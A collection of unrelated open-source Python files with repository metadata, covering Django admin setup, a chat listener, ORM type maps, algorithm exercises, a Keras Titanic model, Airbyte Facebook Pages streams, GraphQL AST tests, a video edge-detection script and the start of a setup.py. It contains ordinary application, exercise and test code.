0e4860fecfdd34a3255003cc8c8df086c14083dd
/python/practise/带你学Django资料及源码/课堂与博客代码/peace_blog/blog/admin.py
9c1fb6228842fe4ec5d8931dc4a0aad2aa044aa9
[]
no_license
anzhihe/learning
503ab9a58f280227011da5eaa4b14b46c678e6f3
66f7f801e1395207778484e1543ea26309d4b354
refs/heads/master
2023-08-08T11:42:11.983677
2023-07-29T09:19:47
2023-07-29T09:19:47
188,768,643
1,443
617
null
2023-08-24T02:10:34
2019-05-27T04:04:10
Python
UTF-8
Python
false
false
289
py
from django.contrib import admin from .models import * # Register your models here. admin.site.register(Banner) admin.site.register(Category) admin.site.register(Tag) admin.site.register(Article) admin.site.register(FriendLink) admin.site.register(Comment) admin.site.register(BlogUser)
b3b23e56815e22c59025e95c60b6cbda2ae81e07
9fbe90eab4cb25022e7c93776da3a5733656a09a
/examples/chat/status.py
9f517a087999e1a586d64cffee8075515a5e83ea
[ "MIT" ]
permissive
Nathanator/networkzero
453e218d6e0b8080158cb968f4acc5e0cb0fb65c
e6bf437f424660c32cf1ef81f83d9eee925f44e7
refs/heads/master
2021-01-15T13:14:53.101742
2016-04-07T20:32:28
2016-04-07T20:32:28
55,724,894
0
0
null
2016-04-07T20:12:18
2016-04-07T20:12:17
null
UTF-8
Python
false
false
467
py
import networkzero as nw0 updates = nw0.discover("chat-updates") while True: action, message = nw0.wait_for_notification(updates) print(action, message) if action == "JOIN": print("%s has joined" % message) elif action == "LEAVE": print("%s has left" % message) elif action == "SPEAK": [person, words] = message print("%s says: %s" % (person, words)) else: print("!! Unexpected message: %s" % message)
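# Editor's addition: a sketch of the sending side of this chat example. It
# assumes nw0.advertise and nw0.send_notification as the natural
# counterparts of the wait_for_notification call above -- an assumption
# about this snapshot of the library, not a verified API.
#
#     import networkzero as nw0
#
#     updates = nw0.advertise("chat-updates")
#     nw0.send_notification(updates, "JOIN", "alice")
#     nw0.send_notification(updates, "SPEAK", ("alice", "hello"))
#     nw0.send_notification(updates, "LEAVE", "alice")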
cb2811ebb7323dde07db3204b7cbb018b4aa24df
b5aef1178c9153ca0c4dd9823e5fa2a2bc64649f
/sqlalchemy_to_ormar/maps.py
1a9e860b78fc123c5831dcea9f9bd6c03d9d63d5
[ "MIT" ]
permissive
collerek/sqlalchemy-to-ormar
970a56c69ff03b7e32b11e4b1ebcb00c3b8d903c
07c1595297221b31db86b3d34b3aad54fa3967da
refs/heads/main
2023-04-23T10:41:04.426391
2021-05-16T14:10:38
2021-05-16T14:10:38
355,256,537
10
1
null
null
null
null
UTF-8
Python
false
false
1,602
py
from typing import Dict, Set, Type import ormar from ormar import Model FIELD_MAP = { "integer": ormar.Integer, "tinyint": ormar.Integer, "smallint": ormar.Integer, "bigint": ormar.Integer, "small_integer": ormar.Integer, "big_integer": ormar.BigInteger, "string": ormar.String, "char": ormar.String, "varchar": ormar.String, "text": ormar.Text, "mediumtext": ormar.Text, "longtext": ormar.Text, "float": ormar.Float, "decimal": ormar.Decimal, "date": ormar.Date, "datetime": ormar.DateTime, "timestamp": ormar.DateTime, "time": ormar.Time, "boolean": ormar.Boolean, "bit": ormar.Boolean, } TYPE_SPECIFIC_PARAMETERS: Dict[str, Dict] = { "string": {"max_length": {"key": "length", "default": 255}}, "varchar": {"max_length": {"key": "length", "default": 255}}, "char": {"max_length": {"key": "length", "default": 255}}, "decimal": { "max_digits": {"key": "precision", "default": 18}, "decimal_places": {"key": "scale", "default": 6}, }, } COMMON_PARAMETERS: Dict[str, Dict] = dict( name={"key": "name", "default": None}, primary_key={"key": "primary_key", "default": False}, autoincrement={"key": "autoincrement", "default": False}, index={"key": "index", "default": False}, unique={"key": "unique", "default": False}, nullable={"key": "nullable", "default": None}, default={"key": "default", "default": None}, server_default={"key": "server_default", "default": None}, ) PARSED_MODELS: Dict[Type, Type[Model]] = dict() CURRENTLY_PROCESSED: Set = set()
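# Editor's addition: a minimal sketch (not part of this module) of how the
# tables above could be combined to resolve an ormar field from a lowercase
# SQLAlchemy type name. `column_attrs` stands in for attributes read off a
# real sqlalchemy Column and is an assumption for illustration.
def _sketch_field_for(type_name: str, column_attrs: Dict) -> object:
    field_factory = FIELD_MAP[type_name.lower()]
    kwargs = {}
    for param, spec in TYPE_SPECIFIC_PARAMETERS.get(type_name.lower(), {}).items():
        kwargs[param] = column_attrs.get(spec["key"], spec["default"])
    return field_factory(**kwargs)

# e.g. _sketch_field_for("varchar", {"length": 50}) -> ormar.String(max_length=50)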
435f09a949e10d5926b47462513ec6a935159a57
ba4f68fb01aa32970dadea67cc8d039b4c0f6d9e
/python/facebook_abcs/graphs/bfs_short_reach.py
d7e090dc241a595327009effbf8e195b8a27e16d
[]
no_license
campbellmarianna/Code-Challenges
12a7808563e36b1a2964f10ae64618c0be41b6c0
12e21c51665d81cf1ea94c2005f4f9d3584b66ec
refs/heads/master
2021-08-03T23:23:58.297437
2020-05-15T07:13:46
2020-05-15T07:13:46
168,234,828
0
0
null
null
null
null
UTF-8
Python
false
false
3,585
py
''' Prompt: Consider an undirected graph where each edge is the same weight. Each of the nodes is labeled consecutively. You will be given a number of queries. For each query, you will be given a list of edges describing an undirected graph. After you create a representation of the graph, you must determine and report the shortest distance to each of the other nodes from a given starting position using the breadth-first search algorithm (BFS). Distances are to be reported in node number order, ascending. If a node is unreachable, print -1 for that node. Each of the edges weighs 6 units of distance. For example, given a graph with 4 nodes and 2 edges: [figure omitted] The start node for the example is node 1. Outputs are calculated for distances to nodes 2 through 4: 6 6 -1. Each edge is 6 units, and the unreachable node has the required return distance of -1. Function Description Complete the bfs function in the editor below. It must return an array of integers representing distances from the start node to each other node in node ascending order. If a node is unreachable, its distance is -1. bfs has the following parameter(s): n: the integer number of nodes m: the integer number of edges edges: a 2D array of start and end nodes for edges s: the node to start traversals from Input Format The first line contains an integer, the number of queries. Each of the following sets of lines has the following format: The first line contains two space-separated integers n and m, the number of nodes and edges in the graph. Each of the subsequent m lines contains two space-separated integers, u and v, describing an edge connecting node u to node v. The last line contains a single integer, s, denoting the index of the starting node. Constraints Output Format For each of the queries, print a single line of space-separated integers denoting the shortest distances to each of the other nodes from starting position s. These distances should be listed sequentially by node number, ascending, but should not include node s. If some node is unreachable from s, print -1 as the distance to that node. Sample Input 2 # the number of queries 4 2 # n: number of nodes m: number of edges in the graph 1 2 # u and v: describing an edge connecting node u to node v 1 3 1 # s for the first query 3 1 # second query: n and m 2 3 2 # s: denoting the index of the starting node. Sample Output 6 6 -1 -1 6 ''' # Very helpful: Breadth-First Search is looping through a sorted array and adding to a queue # https://www.youtube.com/watch?v=-uR7BSfNJko import fileinput # was missing in the original, making the loop below a NameError # Getting user input, Iteration #1 # N = int(input()) # print(N) # for _ in range(N): # parts = input().strip().split(' ') # print(parts) for line in fileinput.input(): parts = line.strip().split(' ') print(parts) # Along with the Breadth-First Search algorithm by lorisrossi # https://www.hackerrank.com/challenges/bfsshortreach/forum def bfs(n, m, edges, s): from collections import deque # Build graph graph = {} for num in range(1, n+1): graph[num] = set() for l, r in edges: graph[l].add(r) graph[r].add(l) reached = {} # Explore graph once frontier = deque([(s, 0)]) seen = {s} while frontier: curr_node, curr_cost = frontier.popleft() for nbour in graph[curr_node]: if nbour not in seen: seen.add(nbour) reached[nbour] = curr_cost+6 frontier.append((nbour, curr_cost+6)) result = [] for node in range(1, n+1): if s != node: result.append(reached.get(node, -1)) return result
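# Editor's addition: a sanity check against the sample cases in the prompt
# (not part of the original submission). Run with stdin closed, e.g.
# `python bfs_short_reach.py < /dev/null`, so the scratch input loop above
# terminates.
if __name__ == '__main__':
    print(bfs(4, 2, [(1, 2), (1, 3)], 1))   # -> [6, 6, -1]
    print(bfs(3, 1, [(2, 3)], 2))           # -> [-1, 6]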
fa97ee9fd2838b1142288a25b7c3b07d01df9382
80f622252281e6288d24b101dda0d4ee3634faed
/Titanic/model/model.py
92f1eea0ae9e1af59615e0f34f8ec795553013ab
[]
no_license
jalondono/HandsOn-MachineLearning
c7cd7ce967180b84dffc2953d9ad5894c2bfc46e
eb3a3f2d6e490a827aa8b50cfb6e606cb3e85c5d
refs/heads/master
2023-01-03T01:10:32.836434
2020-10-29T15:47:27
2020-10-29T15:47:27
300,308,942
1
0
null
null
null
null
UTF-8
Python
false
false
4,158
py
import pandas as pd import numpy as np import tensorflow.keras as K import mlflow.tensorflow import sys import logging import zipfile # mlflow server --backend-store-uri mlruns/ --default-artifact-root mlruns/ --host 0.0.0.0 --port 5000 def getting_data(zipfolder, filename, cols): """ Get the data from a zip file :param zipfolder: path to the zip archive :param filename: csv file to read from the extracted archive :param cols: columns to load :return: train dataset """ with zipfile.ZipFile(zipfolder, 'r') as zip_ref: zip_ref.extractall() data = pd.read_csv(filename, usecols=cols) print('data set shape: ', data.shape, '\n') print(data.head()) return data def process_args(argv): """ convert the command-line arguments into the needed format :param argv: Parameters :return: converted parameters """ # index checks fixed: argv[k] is only read when len(argv) > k data_path = argv[1] if len(argv) > 1 else '../data' debug = argv[2].lower() if len(argv) > 2 else 'false' model_type = argv[3] if len(argv) > 3 else '[256,128]' model_type = model_type[1:-1].split(',') splited_network = [int(x) for x in model_type] alpha = float(argv[4]) if len(argv) > 4 else 0.5 l1_ratio = float(argv[5]) if len(argv) > 5 else 0 return data_path, debug, splited_network, alpha, l1_ratio def create_model(network): model = K.models.Sequential() model.add(K.layers.Dense(units=network[0], input_dim=6, kernel_initializer='ones', kernel_regularizer=K.regularizers.l1(l1_ratio), )) for units in network[1:]: model.add(K.layers.Dense(units=units, kernel_initializer='ones', kernel_regularizer=K.regularizers.l1(l1_ratio), )) model.add(K.layers.Dense(units=1, activation='sigmoid')) opt = K.optimizers.Adam(learning_rate=alpha) model.compile(optimizer=opt, loss='binary_crossentropy', metrics=['accuracy'], ) print(model.summary()) return model def train_model(model, X_train, Y_train, batch_size=128, epoch=80, val_split=0.1): """ Perform the training of the model :param model: model previously compiled :return: history """ # the keyword parameters are now actually used instead of hardcoded values history = model.fit(x=X_train, y=Y_train, batch_size=batch_size, epochs=epoch, validation_split=val_split) return history if __name__ == '__main__': logging.basicConfig(level=logging.WARN) logger = logging.getLogger(__name__) # mlflow mlflow.tensorflow.autolog() # Utils cols from data train_cols = ['Survived', 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare'] test_cols = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare'] X_cols = ['Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Fare'] Y_cols = ['Survived'] # Get value arguments data_path, debug, network, alpha, l1_ratio = process_args(sys.argv) # train Data filename = 'train.csv' data = getting_data(data_path, filename, train_cols) data['Sex_b'] = pd.factorize(data.Sex)[0] data = data.drop(['Sex'], axis=1) data = data.rename(columns={"Sex_b": "Sex"}) # testing data filename = 'test.csv' test = getting_data(data_path, filename, test_cols) test['Sex_b'] = pd.factorize(test.Sex)[0] test = test.drop(['Sex'], axis=1) test = test.rename(columns={"Sex_b": "Sex"}) # filling train na values with mean column_means = data.mean() data = data.fillna(column_means) # filling test na values with mean column_means = test.mean() test = test.fillna(column_means) input_data = np.array(data[X_cols]) label_date = np.array(data[Y_cols]) test_input_data = np.array(test[X_cols]) X_train = input_data Y_train = label_date # definition of the model model = create_model(network) # training model history = train_model(model, X_train, Y_train) # predicting (test.csv carries no labels, so only predictions can be # reported here, not a test score) predictions = model.predict(test_input_data, batch_size=32, verbose=1) print("First predicted survival probabilities:", predictions[:5].ravel())
08a65bb7db851c3827f50ea795ce9e58ad45c818
7eebbfaee45fdc57c4fc6ba32c87c35be1e62b14
/airbyte-integrations/connectors/source-facebook-pages/source_facebook_pages/streams.py
717fb1c76800fc295cff19b40b475069c0e2914a
[ "MIT", "Elastic-2.0" ]
permissive
Velocity-Engineering/airbyte
b6e1fcead5b9fd7c74d50b9f27118654604dc8e0
802a8184cdd11c1eb905a54ed07c8732b0c0b807
refs/heads/master
2023-07-31T15:16:27.644737
2021-09-28T08:43:51
2021-09-28T08:43:51
370,730,633
0
1
MIT
2021-06-08T05:58:44
2021-05-25T14:55:43
Java
UTF-8
Python
false
false
4,651
py
# # Copyright (c) 2021 Airbyte, Inc., all rights reserved. # from abc import ABC from typing import Any, Iterable, Mapping, MutableMapping, Optional import requests from airbyte_cdk.sources.streams.http import HttpStream from source_facebook_pages.metrics import PAGE_FIELDS, PAGE_METRICS, POST_FIELDS, POST_METRICS class FacebookPagesStream(HttpStream, ABC): url_base = "https://graph.facebook.com/v11.0/" primary_key = "id" data_field = "data" def __init__( self, access_token: str = None, page_id: str = None, **kwargs, ): super().__init__(**kwargs) self._access_token = access_token self._page_id = page_id @property def path_param(self): return self.name[:-1] def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]: data = response.json() if not data.get("data") or not data.get("paging"): return {} return { "limit": 100, "after": data.get("paging", {}).get("cursors", {}).get("after"), } def request_params( self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, any] = None, next_page_token: Mapping[str, Any] = None, ) -> MutableMapping[str, Any]: next_page_token = next_page_token or {} params = {"access_token": self._access_token, **next_page_token} return params def parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]: if not self.data_field: yield response.json() records = response.json().get(self.data_field, []) for record in records: yield record class Page(FacebookPagesStream): """ API docs: https://developers.facebook.com/docs/graph-api/reference/page/, """ data_field = "" def path(self, **kwargs) -> str: return self._page_id def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]: return None def request_params(self, **kwargs) -> MutableMapping[str, Any]: params = super().request_params(**kwargs) # we have to define which fields will return from Facebook API # because FB API doesn't provide opportunity to get fields dynamically without delays # so in PAGE_FIELDS we define fields that user can get from API params["fields"] = PAGE_FIELDS return params class Post(FacebookPagesStream): """ https://developers.facebook.com/docs/graph-api/reference/v11.0/page/feed, """ def path(self, **kwargs) -> str: return f"{self._page_id}/posts" def request_params(self, **kwargs) -> MutableMapping[str, Any]: params = super().request_params(**kwargs) params["fields"] = POST_FIELDS return params class PageInsights(FacebookPagesStream): """ API docs: https://developers.facebook.com/docs/graph-api/reference/page/insights/, """ def path(self, **kwargs) -> str: return f"{self._page_id}/insights" def next_page_token(self, response: requests.Response) -> Optional[Mapping[str, Any]]: return None def request_params( self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, any] = None, next_page_token: Mapping[str, Any] = None, ) -> MutableMapping[str, Any]: params = super().request_params(stream_state, stream_slice, next_page_token) params["metric"] = ",".join(PAGE_METRICS) return params class PostInsights(FacebookPagesStream): """ API docs: https://developers.facebook.com/docs/graph-api/reference/post/insights/, """ def path(self, **kwargs) -> str: return f"{self._page_id}/posts" def request_params( self, stream_state: Mapping[str, Any], stream_slice: Mapping[str, any] = None, next_page_token: Mapping[str, Any] = None, ) -> MutableMapping[str, Any]: params = super().request_params(stream_state, stream_slice, next_page_token) params["fields"] = f'insights.metric({",".join(POST_METRICS)})' return params def 
parse_response(self, response: requests.Response, **kwargs) -> Iterable[Mapping]: # unique case so we override this method records = response.json().get(self.data_field) or [] for insights in records: if insights.get("insights"): data = insights.get("insights").get("data") for insight in data: yield insight else: yield insights
ff48c9f51db42b5415104dcad82dcc5e7180f1a0
a097ecf40fee329cfa9e3f77e4b6e9e29a8f148a
/5_section/5_c4.py
ad4129556566f3c699ab43db88f59f5c50ed0ab1
[]
no_license
FumihisaKobayashi/The_self_taught_python
1e7008b17050db3e615c2f3aa68df2edc7f93192
329d376689029b75da73a6f98715cc7e83e8cc2c
refs/heads/master
2021-01-06T16:04:13.382955
2020-07-28T14:39:24
2020-07-28T14:39:24
241,389,313
1
0
null
null
null
null
UTF-8
Python
false
false
215
py
fumi = { "身長": "1.73m", # "height" "好きな色": "緑", # "favorite color": "green" "好きな人": "Hideki Matsui" # "favorite person" } answer = input("身長,好きな色 or 好きな人") # prompt: "height, favorite color or favorite person" if answer in fumi: a = fumi[answer] print(a) # Note: `in` on a dict tests membership among its keys.
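# Editor's addition (illustrative sketch, not in the original file): the
# same lookup via dict.get, which returns None for a missing key and
# avoids the separate membership test.
value = fumi.get(answer)
if value is not None:
    print(value)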
3d1e771da9ec0f32bfd297a1b19794e9054adce4
1825283527f5a479204708feeaf55f4ab6d1290b
/leetcode/python/45/sol.py
3db6f97188dd189aef4c4caf07b43524d9f7f299
[]
no_license
frankieliu/problems
b82c61d3328ffcc1da2cbc95712563355f5d44b5
911c6622448a4be041834bcab25051dd0f9209b2
refs/heads/master
2023-01-06T14:41:58.044871
2019-11-24T03:47:22
2019-11-24T03:47:22
115,065,956
1
0
null
2023-01-04T07:25:52
2017-12-22T02:06:57
HTML
UTF-8
Python
false
false
2,156
py
""" 10-lines C++ (16ms) / Python BFS Solutions with Explanations https://leetcode.com/problems/jump-game-ii/discuss/18019 * Lang: python3 * Author: jianchao-li * Votes: 71 This problem has a nice BFS structure. Let's illustrate it using the example `nums = [2, 3, 1, 1, 4]` in the problem statement. We are initially at position `0`. Then we can move at most `nums[0]` steps from it. So, after one move, we may reach `nums[1] = 3` or `nums[2] = 1`. So these nodes are reachable in `1` move. From these nodes, we can further move to `nums[3] = 1` and `nums[4] = 4`. Now you can see that the target `nums[4] = 4` is reachable in `2` moves. Putting this into code, we keep two pointers `start` and `end` that record the current range of the starting nodes. Each time after we make a move, update `start` to be `end + 1` and `end` to be the farthest index that can be reached in `1` move from the current `[start, end]`. To get an accepted solution, it is important to handle all the edge cases. And the following codes handle all of them in a unified way without using the unclean `if` statements :-) ---------- **C++** class Solution { public: int jump(vector<int>& nums) { int n = nums.size(), step = 0, start = 0, end = 0; while (end < n - 1) { step++; int maxend = end + 1; for (int i = start; i <= end; i++) { if (i + nums[i] >= n - 1) return step; maxend = max(maxend, i + nums[i]); } start = end + 1; end = maxend; } return step; } }; ---------- **Python** """ # The prose and C++ above are kept inside a module docstring so this saved # discussion post is valid Python; the Python solution follows. class Solution: # @param {integer[]} nums # @return {integer} def jump(self, nums): n, start, end, step = len(nums), 0, 0, 0 while end < n - 1: step += 1 maxend = end + 1 for i in range(start, end + 1): if i + nums[i] >= n - 1: return step maxend = max(maxend, i + nums[i]) start, end = end + 1, maxend return step
13f1896c22ae2a9880e175bd288981ebe1216ccf
8d5ba6747531cbd43d63d32265fd608f9081c3b7
/.venv/lib/python2.7/site-packages/indico/modules/events/logs/controllers.py
a436382fa8b13d29f35d97c1b401f0e523a58dd9
[]
no_license
Collinsnyamao/indico
0e433b78803afae5b1ac90483db1f3d90ce2fddb
32adf8123e266eb81439b654abc993b98e0cd7f2
refs/heads/master
2020-03-18T04:55:40.386595
2018-06-02T13:45:47
2018-06-02T13:45:47
134,314,163
1
0
null
null
null
null
UTF-8
Python
false
false
1,324
py
# This file is part of Indico. # Copyright (C) 2002 - 2018 European Organization for Nuclear Research (CERN). # # Indico is free software; you can redistribute it and/or # modify it under the terms of the GNU General Public License as # published by the Free Software Foundation; either version 3 of the # License, or (at your option) any later version. # # Indico is distributed in the hope that it will be useful, but # WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Indico; if not, see <http://www.gnu.org/licenses/>. from __future__ import unicode_literals from indico.modules.events.logs.models.entries import EventLogEntry from indico.modules.events.logs.views import WPEventLogs from indico.modules.events.management.controllers import RHManageEventBase class RHEventLogs(RHManageEventBase): """Shows the modification/action log for the event""" def _process(self): entries = self.event.log_entries.order_by(EventLogEntry.logged_dt.desc()).all() realms = {e.realm for e in entries} return WPEventLogs.render_template('logs.html', self.event, entries=entries, realms=realms)
c35827798e41b221d01c7605547d9563c1b93e01
c040de12811afa588a23ad6c0cd4fdc849ab469f
/saklient/cloud/errors/usernotspecifiedexception.py
4bd94f412d92c987223a12491a2dad83d3c4cda1
[ "MIT" ]
permissive
toshitanian/saklient.python
3707d1113744122c5ab1ae793f22c6c3a0f65bc4
287c56915dd825d676eddc538cbb33b483803dc2
refs/heads/master
2021-05-28T08:13:16.851101
2014-10-09T09:54:03
2014-10-09T09:54:03
null
0
0
null
null
null
null
UTF-8
Python
false
false
790
py
# -*- coding:utf-8 -*- from ...errors.httpforbiddenexception import HttpForbiddenException # module saklient.cloud.errors.usernotspecifiedexception class UserNotSpecifiedException(HttpForbiddenException): ## The requested operation is not permitted. This API must be accessed ## with an authentication method that can identify the user. ## @param {int} status # @param {str} code=None # @param {str} message="" def __init__(self, status, code=None, message=""): # The default message is kept in Japanese (the library is Japanese-facing); # it reads: "The requested operation is not permitted. This API must be # accessed with an authentication method that can identify the user." super(UserNotSpecifiedException, self).__init__(status, code, "要求された操作は許可されていません。このAPIはユーザを特定できる認証方法でアクセスする必要があります。" if message is None or message == "" else message)
c6eafbbe4676917c6f23a05bc73e21e549c0ba3f
43842089122512e6b303ebd05fc00bb98066a5b2
/dynamic_programming/120_triangle.py
99985fab0c45baef506be9737699a9531b32e925
[]
no_license
mistrydarshan99/Leetcode-3
a40e14e62dd400ddb6fa824667533b5ee44d5f45
bf98c8fa31043a45b3d21cfe78d4e08f9cac9de6
refs/heads/master
2022-04-16T11:26:56.028084
2020-02-28T23:04:06
2020-02-28T23:04:06
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,507
py
""" Given a triangle, find the minimum path sum from top to bottom. Each step you may move to adjacent numbers on the row below. For example, given the following triangle [ [2], [3,4], [6,5,7], [4,1,8,3] ] The minimum path sum from top to bottom is 11 (i.e., 2 + 3 + 5 + 1 = 11). """ class Solution(object): def minimumTotal_1(self, triangle): """ :type triangle: List[List[int]] :rtype: int """ result = [] for line in range(1, len(triangle)): result.append([0] * line) result.append(triangle[-1]) for i in reversed(range(len(triangle))): for j in range(i): result[i - 1][j] = min(result[i][j], result[i][j+1]) + triangle[i - 1][j] return result[0][0] def minimumTotal_2(self, triangle): # modify the triangle in place if not triangle: return for i in range(len(triangle)-2, -1, -1): for j in range(len(triangle[i])): triangle[i][j] = min(triangle[i+1][j], triangle[i+1][j+1]) + triangle[i][j] return triangle[0][0] def minimumTotal_3(self, triangle): # O(n) space if not triangle: return result = triangle[-1] for i in range(len(triangle) - 2, -1, -1): for j in range(len(triangle[i])): result[j] = min(result[j], result[j+1]) + triangle[i][j] return result[0] triangle_1 = [[2],[3,4],[6,5,7],[4,1,8,3]]
12431f449479c4225d285315b7a3bb921570c910
efcd21234f3291e8fc561f49a7c88fc57a63e952
/tests/unit/language/ast/test_directive_definition.py
b356575d34de9eab8e68c11d4445ef82a42fc23c
[ "MIT" ]
permissive
tartiflette/tartiflette
146214a43847d2f423bf74594643c1fdefc746f1
421c1e937f553d6a5bf2f30154022c0d77053cfb
refs/heads/master
2023-09-01T02:40:05.974025
2022-01-20T14:55:31
2022-01-20T14:55:31
119,035,565
586
39
MIT
2023-09-11T07:49:27
2018-01-26T09:56:10
Python
UTF-8
Python
false
false
6,673
py
import pytest from tartiflette.language.ast import DirectiveDefinitionNode def test_directivedefinitionnode__init__(): directive_definition_node = DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ) assert directive_definition_node.name == "directiveDefinitionName" assert ( directive_definition_node.locations == "directiveDefinitionLocations" ) assert ( directive_definition_node.description == "directiveDefinitionDescription" ) assert ( directive_definition_node.arguments == "directiveDefinitionArguments" ) assert directive_definition_node.location == "directiveDefinitionLocation" @pytest.mark.parametrize( "directive_definition_node,other,expected", [ ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), Ellipsis, False, ), ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), DirectiveDefinitionNode( name="directiveDefinitionNameBis", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), False, ), ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocationsBis", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), False, ), ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescriptionBis", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), False, ), ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArgumentsBis", location="directiveDefinitionLocation", ), False, ), ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocationBis", ), False, ), ( DirectiveDefinitionNode( name="directiveDefinitionName", 
locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), True, ), ], ) def test_directivedefinitionnode__eq__( directive_definition_node, other, expected ): assert (directive_definition_node == other) is expected @pytest.mark.parametrize( "directive_definition_node,expected", [ ( DirectiveDefinitionNode( name="directiveDefinitionName", locations="directiveDefinitionLocations", description="directiveDefinitionDescription", arguments="directiveDefinitionArguments", location="directiveDefinitionLocation", ), "DirectiveDefinitionNode(" "description='directiveDefinitionDescription', " "name='directiveDefinitionName', " "arguments='directiveDefinitionArguments', " "locations='directiveDefinitionLocations', " "location='directiveDefinitionLocation')", ) ], ) def test_directivedefinitionnode__repr__(directive_definition_node, expected): assert directive_definition_node.__repr__() == expected
3273285dc5118a47952c40dfdd26e29bd612aa47
46f03a8353b3fd0cd1ca35e0d322c4a53649596b
/try.py
193887977e7feaeaa8f466637561399d7a348948
[]
no_license
dragikamov/Video_Converter
d7d73a948853c99840606b89fc79dbcf8e1bde97
e0233f9c190618e30bb85bcfa9df881f0eee058e
refs/heads/master
2020-04-30T15:50:35.037923
2019-03-30T22:35:29
2019-03-30T22:35:29
176,931,695
0
0
null
null
null
null
UTF-8
Python
false
false
7,925
py
import cv2 import numpy as np import os from canny_edge import * # provides detect() import threading from os.path import isfile, join # Function for converting an image to grayscale def rgb2gray(rgb): return np.dot(rgb[...,:3], [0.299, 0.587, 0.114]) # Export of video def exportVid(): frame_array = [] files = [f for f in os.listdir('data/') if isfile(join('data/', f))] files.sort(key = lambda x: int(x[5:-4])) for i in range(len(files)): filename = 'data/' + files[i] img = cv2.imread(filename) height, width, _ = img.shape size = (width,height) print(filename) frame_array.append(img) fourcc = cv2.VideoWriter_fourcc(*'DIVX') out = cv2.VideoWriter('export.avi', fourcc, 24.0, (width,height)) for i in range(len(frame_array)): out.write(frame_array[i]) out.release() # Run edge detection on a batch of frames, one thread per frame. # (Rewritten from sixty copy-pasted t1..t60 blocks; behaviour is unchanged: # start every thread first, then join them all.) def thread(i, imgs): threads = [] for k, img in enumerate(imgs): t = threading.Thread(target=detect, args=(img, i + k + 1)) t.start() threads.append(t) for t in threads: t.join() # Loading the video into python cap = cv2.VideoCapture('bunny.mp4') # Making a folder for the edited frames try: if not os.path.exists('data'): os.makedirs('data') except OSError: print ('Error: Creating directory of data') currentFrame = 0 imgs = [] height = 0 width = 0 n = 0 while(True): # Capture frame-by-frame ret, frame = cap.read() if not ret: # Flush any frames left over from an incomplete batch of 60. if(len(imgs) != 0): for i in range(len(imgs)): detect(imgs[i], currentFrame) # was `img[i]`, a NameError in the original break # Converting the frame to grayscale and adding it to a list name = './data/frame' + str(currentFrame) + '.jpg' print ('Slicing and converting to grayscale...' + name) imgs.append(rgb2gray(frame)) if(currentFrame % 60 == 0 and currentFrame != 0): thread((currentFrame // 60) - 1, imgs) # // keeps the batch index an int imgs = [] # Find height and width height, width, _ = frame.shape currentFrame += 1 image_folder = 'data' images = [img for img in os.listdir(image_folder) if img.endswith(".jpg")] frame = cv2.imread(os.path.join(image_folder, images[0])) height, width, _ = frame.shape exportVid() # When everything done, release the capture cap.release() cv2.destroyAllWindows()
ee0ea350d13c32438c662a8a258423d9b8287956
20c4a239e000b15131251d372ccad9110063a961
/setup.py
91ea45b7093ebde7a34cf7d5eb933f7529893fdf
[ "MIT" ]
permissive
Partidani/hdlConvertor
9d0e382e6e087ac240502538b63f8667004a7715
36d3b58e2641e39c323ed9ee337135e49c64d076
refs/heads/master
2023-04-06T00:03:31.505727
2021-04-19T07:28:25
2021-04-19T07:28:25
366,418,686
0
0
null
null
null
null
UTF-8
Python
false
false
1,810
py
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
import os
from setuptools import find_packages

try:
    from skbuild import setup
except ImportError:
    raise ImportError("Missing scikit-build, (should be automatically installed by pip)")

import sys

this_directory = os.path.abspath(os.path.dirname(__file__))
with open(os.path.join(this_directory, "README.md")) as f:
    long_description = f.read()

deps = ["typing", "future"] if sys.version_info[0] == 2 else []

setup(
    cmake_args=[
